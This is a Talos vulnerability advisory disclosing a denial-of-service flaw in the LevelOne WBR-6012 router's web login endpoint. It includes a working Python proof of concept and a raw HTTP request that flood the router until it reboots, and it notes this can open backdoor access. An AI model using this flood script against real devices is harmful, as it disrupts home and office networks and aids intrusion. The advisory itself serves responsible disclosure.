Talos Vulnerability Report

TALOS-2024-1982

LevelOne WBR-6012 Web Application improper resource allocation vulnerability

October 30, 2024

CVE Number

CVE-2024-31152

SUMMARY

The LevelOne WBR-6012 router with firmware R0.40e6 is vulnerable to improper resource allocation within its web application, where a series of crafted HTTP requests can cause a reboot. This could lead to network service interruptions.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6012 R0.40e6

PRODUCT URLS

WBR-6012 - https://us.level1.com/products/wbr-6012

CVSSv3 SCORE

5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-400 - Uncontrolled Resource Consumption

DETAILS

The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.

The LevelOne WBR-6012 router’s web application is vulnerable to a flood-based denial of service attack due to insufficient rate-limiting measures, which allows attackers to overwhelm the system with a deluge of requests, leading to service disruption. A flood of valid HTTP POST requests to the /cgi-bin/logi endpoint results in a crash and reboot, enabling backdoor access (TALOS-2024-1979).

Exploit Proof of Concept

Sending the below 100-140 times in quick succession, sometimes this only takes ~100 requests, sometimes it’s closer to 1,200.

import requests

url = 'http://192.168.1.1/cgi-bin/logi'

for i in range(2000):
    i = str(i)
    data = {'PS': 'test',
        #  'rc': '=%40',
            'rd': 'status',
        # 'TC': '1707304321.99'
        }
    response = str(requests.post(url, data=data).status_code)

    print('req: ' + str(i) + '\tResp Code: ' + response)
    

POST /cgi-bin/logi HTTP/1.1
Host: 192.168.1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 17
Content-Type: application/x-www-form-urlencoded

PS=test&rd=status

TIMELINE

2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release

Credit

Discovered by Patrick DeSantis of Cisco Talos.

TALOS-2024-1981

TALOS-2024-1997

Intelligence Center

Vulnerability Research

Security Resources

Media

Company